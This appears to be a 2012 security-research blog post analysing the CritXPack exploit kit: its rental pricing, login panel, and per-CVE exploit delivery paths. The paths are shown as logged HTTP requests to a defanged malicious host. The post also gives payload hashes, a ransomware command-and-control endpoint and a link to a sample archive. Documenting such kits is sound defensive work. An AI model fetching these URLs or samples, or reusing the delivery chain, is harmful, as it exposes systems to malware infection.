2012-11-12 - Connect the dots.

Meet CritXPack (Previously Vintage Pack)

CritXPack

I first heard about this Exploit Kit through a tweet from Security Obscurity (Thanks ! :) )


It was named Vintage Pack at that time :


The enrollment form was simple :

Vintage Pack form to apply


Cтоимость аренды: в месяц - 400$, в неделю - 100$
 which Google Translate as :
Cost of rent: a month - $ 400 a week - $ 100

Few days ago the banner/name changed. Here is the new "apply" form :

CritXPack apply form


Here is the text :


Rent: 30$ - 1 day; 150$ - 1 week; 500$ - 1 month; traffic limit - 100k hits per day. 

License on your server: 600$ - 3 month; 900$ - 6 month; 1200$ - 1 year; +200$ - multidomain license. 

ЗЫ: Мы сменили баннер и название, которое было использовано в течение тестового периода и проведения пробной рекламной акции. Сейчас связка работает в штатном режиме, название и баннер меняться не будут. На профильных форумах в данный момент никакой рекламы НЕТ. Отзывы от наших партнеров, пользующихся связкой и имеющих репутацию на соответствующих форумах, можно получить в ЧАСТНОМ порядке и только в случае их согласия. 

Google Translate for the Russian part :

PS: We have changed the banner and the name that was used during the test period and the Pilot promotion. Now a bunch of works in normal mode, the name and the banner will not change. On specialized forums are currently no ads NO. Reviews from our partners who use a bunch and have a reputation in the appropriate forums, you can get in private and only if they consent.


And thanks to Jindrich Kubec from Avast who shared yesterday an unusual URL pattern

Jindrich Kubec tweet about the new kind of Url

we can now say hello to CritXPack.

CritXPack Login Screen 2012-11
Note the Captcha (3rd time i see this on bad guy panel, after Upas then Blackhole 2.0)

Updated Login Screen (2013-02)


There are some double tilt counter measures (you'll get a 502 error)
There are some Geolocation features (it seems - could be filter outside of the EK) :
Filter in action for localized strike.

I tested different vuln path on it :

CVE-2012-1723 (seems safe (?!) )

CVE-2012-1723 path on CritXPack (safe)



GET http://magrety.herapid .org/b081112s/i.php
200 OK (text/html)

GET http://magrety.herapid .org/b081112s/j.php?t=u0059u0053u0072u0074u0035u0044u0053u0053u0053u0046
200 OK (application/java-archive) -- 65571830100b0d809b44fefc094b5bf4


 65571830100b0d809b44fefc094b5bf4 nicely tagged in VirusTotal



CVE-2012-4681 Boom...

CVE-2012-4681 path in CritXPack 



GET http://magrety.herapid  .org/b081112s/i.php
200 OK (text/html)

GET http://magrety.herapid  .org/b081112s/j.php?t=u0059u0053u0072u0074u0035u0044u0053u0031u0072u0072
200 OK (application/java-archive)

GET http://magrety.herapid  .org/b081112s/j.php?t=u0059u0053u0072u0074u0035u0044u0053u0031u0072u0072
200 OK (application/java-archive)

GET http://magrety.herapid  .org/b081112s/load.php?e=u004au0061u0076u0061&token=u0064u0065u0066u0061u0075u006cu0074&
200 OK (application/octet-stream)


MDAC path (Seems safe)

MDAC path on CritXPack safe but see : PluginDetect 0.7.9 :)

GET http://magrety.herapid .org/b081112s/i.php
200 OK (text/html)

GET http://magrety.herapid .org/b081112s/js/pd.js
200 OK (application/javascript)



CVE-2011-2010 path (seems safe):

CVE-2011-2010 Path on CritXPack (safe)


GET http://magrety.herapid  .org/b081112s/i.php
200 OK (text/html)

GET http://magrety.herapid  .org/b081112s/js/pd.js
200 OK (application/javascript)

GET http://magrety.herapid  .org/b081112s/a.Test
404 Not Found (text/html)

CVE-2010-0188 Boom...


CVE-2010-0188 path in CritXPack

GET http://magrety.herapid  .org/b081112s/i.php
200 OK (text/html)

GET http://magrety.herapid  .org/b081112s/js/pd.js
304 Not Modified ()

GET http://magrety.herapid  .org/b081112s/a.Test
404 Not Found (text/html)

GET http://magrety.herapid  .org/b081112s/p5.php?t=u0059u0053u0072u0074u0035u0044u0072u0072u0035u0031&oh=ZFhYT3N6ekxGakhpWFo5ZGlIRk82ZjlVSGp6bEQ1IyMjWUJ6b1VGZjlPZE9SaU00RERBRDRERHJTNEREcnJwWFVQaT1NNEREclM0RERyQTRERHJyNEREciM0REQxQTRERHJXNEREMVNw
200 OK (application/pdf) -- d23236aaa9756f74d51c42e5109d7927

GET http://magrety.herapid  .org/b081112s/load.php?e=u0050u0064u0066&token=u0064u0065u0066u0061u0075u006cu0074&
200 OK (application/octet-stream)


CVE-2011-3544 Boom...

CVE-2011-3544 Path on CritXPack

GET http://magrety.herapid  .org/b081112s/i.php
200 OK (text/html)

GET http://magrety.herapid  .org/b081112s/js/pd.js
200 OK (application/javascript)

GET http://magrety.herapid  .org/b081112s/j.php?t=u0059u0053u0072u0074u0035u0044u0031u0041u0035u0044
200 OK (application/java-archive)

GET http://magrety.herapid  .org/b081112s/load.php?e=u004au0061u0076u0061&token=u0064u0065u0066u0061u0075u006cu0074&
200 OK (application/octet-stream)

CVE-2012-0507 Boom...

CVE-2012-0507 path on CritXPack




GET http://magrety.herapid .org/b081112s/i.php
200 OK (text/html)

GET http://magrety.herapid .org/b081112s/js/pd.js
200 OK (application/javascript)

GET http://magrety.herapid .org/b081112s/j.php?t=u0059u0053u0072u0074u0035u0072u0072u0035u0053u0035
200 OK (application/java-archive)

GET http://magrety.herapid .org/b081112s/load.php?e=u004au0061u0076u0061&token=u0064u0065u0066u0061u0075u006cu0074&
200 OK (application/octet-stream)


What about the file tree of the server ?
Here are some the dir/files I was able to see:
/b081112s/load.php
/b081112s/cpt.php
/b081112s/panel.php
/b081112s/captcha.php
/b081112s/i.php
/b081112s/j.php
/b081112s/f/
/b081112s/config.php
/b081112s/img/space.png
/b081112s/img/btn_signin.png


Out of the scope of this post but what about the payload ?
a6a61216942a1de358c5b55d8fb66cb1 yesterday
and b333ccb16027f0e168ff1846ea913a58 something with a C&C here :
lezniklitoristorii   .in POST /image/ukash-psk/price.php HTTP/1.1
In my opinion it's in direct relation with the Ransomware Casier/GangstaService Affiliate. You remember ?
IE (Ireland) != IR (Iran)  (any feedback on the payload is welcome :). It's maybe just a Zbot/Citadel).


For the files all in one Zip :

Content of the Zip
http://goo.gl/0vbrG (Mega)

Want to read more about CVEs and Exploit Kits ?
Common Exploit Kits 2012 Poster - 2012-11-11 Mila - Contagio
Wild Wild West - 2012-23-10 - Kahu Security
An Overview of Exploit Packs (Update 17) October 12, 2012 - 2012-10-12 Mila - Contagio

Want to read more about the payload ?

Casier on botnets.fr
Ransomware Casier - Sharing Design with Lyposit - Gaelic & Persian (?) - 2012-09-19
Ransomware « Trojan.Casier » Panel - 2012-09-18 - Malekal Morte - Malekal's Site
Karagny.L unpack - 2012-09-04 - RootBsd - Malware.lu technical analysis
Gangstaservice Winlock Affiliate - 2012-08-01 - Xylitol - Xylibox

Post Publication :
Got Malware? Rent an Exploit Service - Kevin Stevens - The Day Before Zero - Damballa - 2013-01-29
Meet Safe Pack (v2.0)... Again :)  - 2013-04-21